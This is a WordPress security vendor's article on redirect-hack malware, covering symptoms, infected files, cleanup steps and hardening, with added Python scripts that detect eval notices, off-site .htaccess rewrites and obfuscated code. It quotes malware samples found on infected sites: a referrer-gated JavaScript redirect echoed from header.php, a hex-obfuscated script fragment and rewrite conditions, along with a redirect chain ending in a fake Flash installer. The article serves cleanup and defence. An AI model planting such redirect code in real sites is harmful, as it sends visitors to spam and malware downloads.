WordPress website security and protection from malware or malicious code has become more important than ever in 2024. It’s a well-known fact that WordPress is used by more than 40% of websites. An estimated 64 million websites currently use WordPress, and over 400 million people visit WordPress websites every month. As a result, WordPress hacking is on the rise in 2024.
According to Sucuri, WordPress malware infections saw a considerable increase from 83% to 90% in 2020-21.
According to Wp Hacked Help experts, in 2024 more than 60% of WordPress sites were infected with malware that redirects the site to another site. It is logical to conclude that WordPress users are more prone to encountering malware of this type in 2024 as well.
Is your WordPress site redirecting to another website? You are a victim of a redirect hack. In this article, we provide detailed information about the WordPress malware redirect (URL redirect hack) and its fix, and show you how to fix a hacked WordPress site that redirects to another site.
Let’s Get Started With An Updated Step-By-Step Guide to Cleanup Malicious Redirects in WordPress Site. (Video & Infographic Included)
It’s important to understand this hack so that you can clean up your website and also prevent it from recurring in the future. In case you are short of time, we can fix your hacked WordPress site and remove the malware from it.
We often come across users with the following queries. If you have the same questions in mind, this post is your one-stop solution.
Why my website is redirecting to spam website?
Why my WordPress website is being redirected to another site?
How to stop my website redirecting to another site?
Often, we come across people asking why their website is redirecting to another site or to multiple websites. The straightforward answer is that your WordPress site has been hacked and is infected with malware that sends visitors to spammy or phishing sites.
The intent behind inserting such malicious redirects can be black hat SEO or obtaining ad impressions. The attacker exploits vulnerabilities present in your WordPress site via a backdoor or malicious scripts hidden in the source code. In some cases, the wp-admin area also throws a 404 page not found error.
This could be due to an infected WordPress plugin, or malware injected into header.php, footer.php or .htaccess. We have seen many instances of such a hack where a WordPress site URL redirects to another site, and have fixed it successfully.
This can negatively impact your business in many ways.
“WordPress Malware Redirect” or “WordPress Redirect Hack” is a kind of malware or exploit where the infected site redirects visitors to malicious websites, phishing pages and malware websites. It is likely due to code injected into your WordPress database, which makes your WordPress site redirect to another site.
You can easily make out that your wordpress is infected with a redirect malware. Look out for these signs and symptoms to diagnose your site for redirect malware.
In case you come across any of the above mentioned symptoms, get in touch with us right away. Our scanner will thoroughly analyze your website, find the location of the hack & start the removal process.
Generally, a malicious WordPress hacked redirect is detected through the site’s front end, when a visitor is redirected to another page or website instead of the one requested. In most cases hackers use a particular piece of malicious code to redirect the website to a porn or scam website to harm your website. Commonly used tricks include:
If a malicious script is added by hackers, it is often named to look like a legitimate file that is part of the WordPress core files on the website. Hackers can add malicious code to the wp-content/plugins or wp-content/uploads folders, .htaccess, wp-includes, wp-content/themes, or the wp-config.php file.
We recently noticed that a large number of WordPress sites have been redirecting to malware-infected domains such as ibuyiiittraffic[.com] and i.cuttttraffic[.com]. With this kind of redirection malware, the site’s webmaster comes across a 404 error on wp-admin. This is accomplished by infecting the website through a backdoor hack, or by malicious JavaScript introduced via SQL injection or CSS. This is an explicit example of malware redirection ‘chains’, where websites get automatically redirected multiple times before landing on the domain desired by the attacker.
In other instances, it redirects when you click anywhere on the page or click ALLOW.
There are many instances found over the net while doing a Google search where we can see this kind of hack in action. In such cases, we can see that a website initially redirects to clicks.xxfdftrafficx[.com], then to wwwx.xdsfdstraffic[.com], then to red.goabcdforward[.com], yellowlabel*****.[com] or ticker.*******records[.com] before landing on one of the sites.
We did a Google search to find instances of such a redirection hack and found one site in the SERPs that was already infected.
There are other instances where the redirected domain customizes itself according to the location of the user. For example, if a user is from another country, the malware page will translate itself to his native language. Same goes for other locations as well.
Other instances of presence of malicious codes, which resulted in random redirection of visitors to malicious sites on hacked WordPress sites decoded.
Malicious JavaScript can also be inserted into widgets by appending obfuscated JavaScript to the files.
An attacker can add a few lines of JavaScript to some or all of the JavaScript files within the site. A search of the site files for the URL to which the site is redirecting might not find any results, because this JavaScript is often obfuscated. Here is an example:
var_0xaae55=["","\x7A\x7F\x74\x7E","\x62\x75\x66\x75\x62\x63\x75","\x63\x60\x7C\x79\x64","\x3E\x...
Vulnerabilities such as Stored Cross-site Scripting (XSS) in WordPress plugins make it possible for hackers to add malicious JavaScript code to your website. When hackers get to know that a plugin is vulnerable to XSS, they find all the sites that are using that plugin and try to hack them. Plugins such as Contact Form 7, WordPress Ninja Forms, WordPress Yellow Pencil Plugin, Elementor Pro and many others have been targets of such redirection hacks.
In general, the malicious code of 10 to 12 lines is inserted in header.php of the WordPress website.
When this is decoded the main part of the malware looks somewhat like this:
There is a logic behind the code. It simply redirects visitors to default7.com if it is their first visit, and then sets the 896diC9OFnqeAcKGN7fW cookie for approximately 1 year to track returning visitors.
echo'<script>var s = document.referrer;if (s.indexOf("google") > 0 || s.indexOf("bing") > 0 || s.indexOf("yahoo") > 0 || s.indexOf("aol") > 0) { self.location = \'http://yee****boost**750***sale*.com/\';}</script > '; ?>
Depending on the browser and IP a user can be redirected to any random domain listed below
There are various other effects of this malware that are somehow caused by few obvious bugs in the malicious code.
For example, see this line #9 in the decoded version
if ($_GET['6FoNxbvo73BHOjhxokW3'] !== NULL) {
For some reason the malware checks for the 6FoNxbvo73BHOjhxokW3 parameter and generally does nothing if a GET request contains it. That’s not a problem in itself. The problem is that the code doesn’t make sure such a parameter exists before checking its value. In PHP, this causes a notice like this:
Notice: Undefined index: 6FoNxbvo73BHOjhxokW3 in /home/account/public_html/wp-content/themes/currenttheme/header.php(8) : eval()'d code on line 9
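That notice doubles as a detection signal: a PHP message whose location ends in eval()'d code names the file and line where evaluated code is running. The triage script below is an added example, not part of the original article; the log lines are constructed around the notice quoted above, and the timestamps and the other two entries are made up.

```python
import re
from collections import defaultdict

# PHP reports code run through eval() as "<file>(<line>) : eval()'d code";
# nested evals repeat the suffix. Both apostrophe forms are accepted because
# copied log excerpts often carry the typographic one.
EVAL_NOTICE = re.compile(
    r"(?:Notice|Warning|Deprecated|Fatal error):\s+(?P<msg>.*?)"
    r" in (?P<file>/\S+\.php)\((?P<eval_line>\d+)\)"
    r"(?P<chain>(?: : eval\(\)['’]d code(?:\(\d+\))?)+) on line \d+"
)

# Constructed log excerpt: the first two lines reuse the notice quoted above,
# the timestamps and the other two lines are made up for illustration.
SAMPLE_LOG = """\
[01-Jan-2024 10:00:01 UTC] PHP Notice:  Undefined index: 6FoNxbvo73BHOjhxokW3 in /home/account/public_html/wp-content/themes/currenttheme/header.php(8) : eval()'d code on line 9
[01-Jan-2024 10:00:07 UTC] PHP Notice:  Undefined index: 6FoNxbvo73BHOjhxokW3 in /home/account/public_html/wp-content/themes/currenttheme/header.php(8) : eval()'d code on line 9
[01-Jan-2024 10:02:30 UTC] PHP Notice:  Undefined variable: post in /home/account/public_html/wp-content/plugins/example-plugin/widget.php on line 41
[01-Jan-2024 10:03:12 UTC] PHP Warning:  Undefined variable $k in /home/account/public_html/wp-includes/example.php(3) : eval()'d code(1) : eval()'d code on line 2
""".splitlines()


def eval_notices(log_lines):
    """Group messages raised inside eval() by (file, line of the eval call)."""
    hits = defaultdict(lambda: {"messages": set(), "count": 0, "depth": 0})
    for line in log_lines:
        m = EVAL_NOTICE.search(line)
        if not m:
            continue                      # ordinary notice, not from eval()
        entry = hits[(m["file"], int(m["eval_line"]))]
        entry["messages"].add(m["msg"])
        entry["count"] += 1
        entry["depth"] = max(entry["depth"], len(re.findall(r"eval\(\)", m["chain"])))
    return dict(hits)


if __name__ == "__main__":
    for (path, line), info in sorted(eval_notices(SAMPLE_LOG).items()):
        print(f"{path}:{line} eval depth {info['depth']}, {info['count']} hits, {sorted(info['messages'])}")
```

A theme or core file that appears in this report is worth opening at the reported line, since stock WordPress templates have no reason to call eval() there.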
In many cases, we have seen attackers hiding malicious code or files in the .htaccess file. This code sometimes looks exactly like legitimate code, which makes it more difficult to identify and delete. Besides being inserted into .htaccess files, code can also be disguised in other WordPress core files like wp-config.php, wp-vcd, etc., to name a few.
The following image shows the hidden codes the security experts found on one of the clients’ sites.
Attackers can make changes to your .htaccess file, as it is a favorite location for placing malicious redirects. This file exists on your server and provides directives to the server. Through it, the server passes requests on to WordPress’s primary index.php file to be handled. Often, these types of redirect chains (as seen in the examples above) redirect based on the type of browser or device, or on the site that referred the visitor to your site (most often one of the search engines). An .htaccess redirect can look like this:
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} android||meego|iphone|bada|bb\d+\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobi

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|ms
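As an added example (not from the original article), this Python script audits an .htaccess file for the pattern just described: a RewriteRule whose target is another host, gated by RewriteCond tests on HTTP_USER_AGENT or HTTP_REFERER. The sample file, the redirect.invalid host and the own_hosts parameter are constructed for illustration.

```python
import re

COND = re.compile(r"^\s*RewriteCond\s+%\{(\w+)\}", re.I)
RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)", re.I)
HOST = re.compile(r"^https?://([^/:]+)", re.I)
VISITOR_VARS = {"HTTP_USER_AGENT", "HTTP_REFERER"}   # who the visitor is / where from

# Constructed sample: the stock WordPress block followed by an injected rule
# set modelled on the truncated rules quoted above (redirect.invalid is a placeholder).
SAMPLE = r"""# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (android|iphone|blackberry) [NC]
RewriteRule ^(.*)$ http://redirect.invalid/in.php [R=302,L]
"""


def audit_htaccess(text, own_hosts=()):
    """Return (line_no, reason) for each RewriteRule that sends visitors off-site."""
    findings, pending = [], []     # pending: variables tested by preceding RewriteCond lines
    for no, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        cond = COND.match(line)
        if cond:
            pending.append(cond.group(1).upper())
            continue
        rule = RULE.match(line)
        if not rule:
            continue
        host = HOST.match(rule.group(1))
        if host and host.group(1).lower() not in own_hosts:
            reason = f"off-site redirect to {host.group(1)}"
            gated = sorted(set(pending) & VISITOR_VARS)
            if gated:
                reason += " only when " + "/".join(gated) + " matches"
            findings.append((no, reason))
        pending = []               # RewriteCond applies only to the next RewriteRule
    return findings


if __name__ == "__main__":
    for no, reason in audit_htaccess(SAMPLE):
        print(f"line {no}: {reason}")
```

Pass the site's own hostnames in own_hosts so that a legitimate HTTP-to-HTTPS or www redirect is not reported.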
Below you can see an example of hacked htaccess file.
Once they land on your website by overcoming a vulnerability, they can add themselves as an administrator to the site. Now that they are dealing with the full power of the site, they are redirecting it to other illegal, obscene, or unverified domains.
Users were also faced with a situation when using Internet Explorer. On Internet Explorer, the malware took users to websites that forced bogus Java updates and Flash updates. This link led to the download of the adobe_flash_player-31254524.exe file. Several security services reported that it was malware.
The strange case is when you use Internet Explorer the redirect chain may somewhat look like this:
default7 .com -> advertisementexample .com/d/p/test246.com?k=e88965c228fb1da3ff5ecff0d3034e7a.1462363771.823.1&r= -> maintainpc .soft2update .xyz/vtrescs?tyercv=5qe5FetFrItyco5HNTadzxMu9Nwdv__MlK_dmzyotoo.&subid=102860_bebd063b36f47778fce4592efccae37a&v_id=e5tsIAwpqr6ffJ2kShbqE1F3WXTIU4auGIx7jpVqifk. -> intva31 .saturnlibrary .info/dl-pure/1202231/31254524/?bc=1202231&checksum=31254524&ephemeral=1&filename=adobe_flash_player.exe&cb=-1388370582&hashstring=oZy9K7h7eaHC&usefilename=true&executableroutePath=1202445&stub=true
This code leads to websites that push fake Java and Flash Player updates onto your screen. See the screenshot attached above for reference.
Follow these steps to detect and remove malicious redirect hack in WordPress.
There are different places where you can look for malware on your website. It’s not always an easy way to scan the code on every page of your website, piece by piece. Sometimes the culprit is locked away somewhere on your server.
Still, there are some places that the attackers primarily target. You will need the ftp / ftps login credentials to navigate to these locations and initiate the malware cleaning process.
If your website suddenly redirects to one or more anonymous websites, you should look at the following sections of the suspicious code:
NOTE: Always back up the WordPress database before making any changes to the core files and the database of the website. Having a backup is the best safeguard: if you accidentally make a mistake while cleaning your site, the backup lets you recover.
Follow this simple 5-Step guide to cleanup malware from your hacked WordPress site which results in redirection to another spam site:
If you suspect that your website has been hacked with a malicious script, there are different ways to verify. However, before running them, you should generate a full backup of your website. Although your site can be hacked, there is still a possibility that the situation will get worse before it gets better.
There are various ways of checking your site, and if you find that your website has been hacked with a malicious script, you need to generate a complete backup of your website. While removing malware from a WordPress site you might make a mistake, and then that backup acts as your savior. Once you have backed up your complete website, you’re ready to run a website scan using cutting-edge WordPress Vulnerability & Malware Scanners.
Additional Tip: You may also try the Google Diagnostic Page tool to help you find out exactly which part of your website is infected and the number of infected directories/files.
Additional Tip: There are many WordPress security scanners online that offer a free malware scan. Here you can get a complete list of 60+ online WordPress vulnerability scanners & security tools.
Scan My Server: Scans for malware, SQL injections, XSS, and more with a detailed report. The detailed report is emailed to you and takes approximately 24 hours.
There are number of places where you can locate the malicious code on your website. We understand it’s definitely not an easy task to scan the code chunk by chunk in each page of your website. There are times when the culprit can be enclosed somewhere in your server. And for few places you’ll need ftp/ftps login details to get access to these places to start the malware cleaning process.
Some of the most sensitive areas prone to infection are index.php, index.html, theme files, etc.
You can also look for malicious code with keywords like ‘eval’ or ‘eval base64_decode’. Apart from this, when carrying out a WordPress redirect hack, an attacker might also inject JS code into files with the .js extension.
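An added example, not from the original article, that turns this search into a script run over a downloaded copy of the site. It looks for the eval/base64_decode keyword, the referrer-gated redirect and the hex-escaped string table shown earlier, plus PHP files under an uploads folder; gzinflate, the check names and the embedded samples are assumptions constructed for illustration.

```python
import os
import re

# Heuristics for the three patterns this article shows. Matches are leads for
# manual review, not verdicts: legitimate code can use these constructs too.
CHECKS = [
    ("eval-of-decoded-payload",
     re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate)\s*\(", re.I)),
    ("referrer-gated-redirect",
     re.compile(r"document\.referrer.{0,400}?\b(?:self|window|top|document)"
                r"\.location\s*(?:\.href\s*)?=(?!=)", re.I | re.S)),
]
# A string literal made up entirely of \xNN escapes, as in obfuscated JS tables.
HEX_STRING = re.compile(r"""(["'])(?:\\x[0-9a-fA-F]{2}){3,}\1""")
SCAN_EXT = (".php", ".js", ".html", ".htm")

# Constructed, harmless samples modelled on the snippets quoted in the article.
EVAL_SAMPLE = '<?php eval(base64_decode("ZWNobyAxOw==")); ?>'   # decodes to: echo 1;
REFERRER_SAMPLE = r"""<?php echo'<script>var s = document.referrer;if (s.indexOf("google") > 0) { self.location = \'http://redirect.invalid/\';}</script>'; ?>"""
HEX_SAMPLE = r'var _0xaae55=["","\x7A\x7F\x74\x7E","\x62\x75\x66\x75\x62\x63\x75","\x63\x60\x7C\x79\x64"];'


def scan_text(text):
    """Return the sorted names of the heuristics that match a file's contents."""
    found = {name for name, rx in CHECKS if rx.search(text)}
    if sum(1 for _ in HEX_STRING.finditer(text)) >= 3:
        found.add("hex-escaped-string-table")
    return sorted(found)


def scan_tree(root):
    """Walk a local copy of the site; map relative path -> matched heuristics."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXT):
                continue
            path = os.path.join(folder, name)
            rel = os.path.relpath(path, root)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_text(fh.read())
            # WordPress stores media under uploads; PHP there deserves a look.
            if name.lower().endswith(".php") and "uploads" in rel.split(os.sep):
                hits.append("php-under-uploads")
            if hits:
                report[rel] = hits
    return report


if __name__ == "__main__":
    import sys
    for rel, hits in sorted(scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items()):
        print(f"{rel}: {', '.join(hits)}")
```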
PRO TIP: You can also compare the website code from the backup by using various code comparison tools e.g. diff checker or pretty diff to compare your plugin files with the original ones. For this, you have to download the exact same plugins from the WP repository and once installed you can start the code comparison to find out the differences.
If the attacker has access to WP-ADMIN, he can modify the theme files via infected header.php. This can be avoided by adding the following code to wp-config.php file. It will disable the user’s ability to change PHP files via wp-admin.
define( 'DISALLOW_FILE_EDIT', true );
Then you need to update the theme, plugins and install all new major updates available. Make sure everything is as up to date as possible. This will reduce the vulnerabilities of your website.
Finally, change all passwords on your website. And I mean all! Not only the WordPress admin password: you also need to reset your FTP account passwords, regenerate the WordPress salt keys, and change the passwords for your database(s), hosting and anything else related to your site.
At times there is no harm in running tests to analyze whether your website is infected with malware or malicious code. For this, you can run a test that pretends to be a particular user agent or Googlebot, using a Googlebot simulator, or you can use FETCH AS GOOGLE from the website’s webmaster console. There are a few commands that work through an SSH client. By employing certain code you can look into the place where the hacking has been done, and further WordPress malware removal can be done manually too.
UPDATE – GSC has been updated and the fetch as google tool was replaced by URL inspection tool as seen below:
First, you’ll need to remove the malicious scripts that cause the website to redirect to the abusive sites. Identify all the pages on your website with malicious code and remove them from search engines. These pages can be removed from the search engine results together by using the Remove URLs feature in Google Search Console. Also, update the plugins and themes, and ensure the new core theme is installed and up to date. Change or reset the passwords, and regenerate the WordPress salt keys.
Here are some WordPress security plugins that can detect infected files:
Google Webmaster Tools is one of the best tools for webmasters, and you can get it for free. If you have not yet submitted your website in GWT, you are missing out on a lot of vital information regarding your website. Here I’m sharing a step-by-step guide to submitting a malware review request using Google Webmaster Tools:
Here you will see a list of URLs that Google suspects are infected with malware. Once you have cleaned all hacked files and your website is malware free, simply click on Request a Review and add notes describing the actions you have taken to remove the malware.
It’s important to secure your wordpress site in 2024 by following the guidelines listed below if you want to prevent redirect hack on your site in future:
If you don’t have time or the expertise to scan and clean up WordPress Hacked Redirect then we can do it for you. This is a priority service that will restore your hacked WordPress site in a day or less. We take full WordPress database backup & scan your entire site to ensure all malware is deleted, and all infected and vulnerable files are replaced with fresh, secure copies.
Our WordPress Malware Removal service helps to remove all malware, WordPress backdoors, Google blacklist warning messages, and protection against common WordPress vulnerabilities.
Our Next Gen WordPress security services includes malware removal, hack recovery, WordPress hardening, WordPress updates, secure backups and much more.